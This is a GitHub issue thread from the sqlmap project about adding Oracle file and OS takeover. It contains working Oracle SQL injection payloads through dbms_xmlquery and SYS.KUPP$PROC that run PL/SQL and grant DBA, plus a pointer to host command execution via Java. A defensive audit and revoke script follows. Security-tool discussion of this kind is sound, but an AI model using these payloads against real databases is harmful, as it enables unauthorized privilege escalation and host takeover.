
File and operating system takeover support for Oracle #26

@bdamele

Description


Add support to takeover the file system when the back-end DBMS is Oracle.

References:

Activity

ghost assigned on Jun 26, 2012

infodox commented on Jul 3, 2012


We were looking at this: http://code.google.com/p/bsqlbf-v2/ as an example of how to do takeover on Oracle DB. Perhaps we will have a pull request ready soon <3


infodox commented on Jul 5, 2012


@stamparm @sqlmapproject @inquisb this is possible, though you would have to provide multiple methods and brute-force your way to the right one or use DBMS fingerprinting to figure out the right trick. Would certainly be a worthy addition to it! See my above link.


firefart commented on Aug 30, 2012


Maybe this helps:
In Oracle there are 2 functions granted to PUBLIC by default:
dbms_xmlquery.newcontext()
dbms_xmlquery.getxml()

These 2 functions allow execution of anonymous PL/SQL blocks within an SQL statement. Extremely helpful when injecting in Oracle databases.
Examples:
select dbms_xmlquery.newcontext('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual

select dbms_xmlquery.getxml('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual

With this technique it would be possible to create a Java package with Runtime.exec() to take over the database host (the user needs the rights (grants) for this operation, but this can be checked via the Oracle system tables).


bdamele commented on Dec 5, 2012


@infodox where's your pull request? :)


steelbrain commented on Jul 28, 2016


Bump


SebaNuss commented on Apr 12, 2018


There seem to be a few methods to execute OS commands, for example through the SYS.KUPP$PROC.CREATE_MASTER_PROCESS function in Oracle up to 11g2.

For example if a URL is vulnerable to AND based SQLi, you could run <url>/id=2' and (Select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT dba TO user;''''; END;'';') from dual) is not null--

I used this in a test scenario and was able to create a user and grant it DBA on Oracle 11g2.

I came across this whitepaper that goes into a lot more detail, including privilege escalation.
I hope it might be helpful.
https://media.blackhat.com/bh-us-10/whitepapers/Siddharth/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf
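A defender-side check covering both this comment and firefart's note above that the required grants "can be checked via the Oracle system tables". This is an added example, not code from the thread or from sqlmap; APP_USER is a placeholder for the application's database account, and the statements assume a DBA session with traditional (non-unified) auditing available.

```sql
-- Added audit query (not from the thread or sqlmap): which of the packages named in
-- this issue are executable by PUBLIC or by the application account (APP_USER is a
-- placeholder)?  Any row here means an SQL injection in that account's session
-- can reach anonymous PL/SQL or the KUPP$PROC entry point.
SELECT grantee, owner, table_name, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name IN ('DBMS_XMLQUERY', 'KUPP$PROC')
   AND grantee IN ('PUBLIC', 'APP_USER')
 ORDER BY table_name, grantee;

-- Accounts holding DBA (the target of the "GRANT dba TO user" payload above) or
-- JAVASYSPRIV (needed for a Java stored procedure to call Runtime.exec()).
-- The application account should appear in neither list.
SELECT grantee, granted_role, admin_option
  FROM dba_role_privs
 WHERE granted_role IN ('DBA', 'JAVASYSPRIV')
 ORDER BY granted_role, grantee;

-- Detection: record every execution of DBMS_XMLQUERY so that the
-- "declare pragma autonomous_transaction; begin execute immediate ..." pattern
-- from this thread shows up in the audit trail (DBA_AUDIT_TRAIL) rather than
-- going unnoticed.
AUDIT EXECUTE ON sys.dbms_xmlquery BY ACCESS;

-- Mitigation: DBMS_XMLQUERY is granted to PUBLIC by default, so revoking it is the
-- stronger step; test first, because applications that legitimately call it will
-- break, and re-grant only to the specific accounts that need it.
REVOKE EXECUTE ON sys.dbms_xmlquery FROM public;
```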

        File and operating system takeover support for Oracle · Issue #26 · sqlmapproject/sqlmap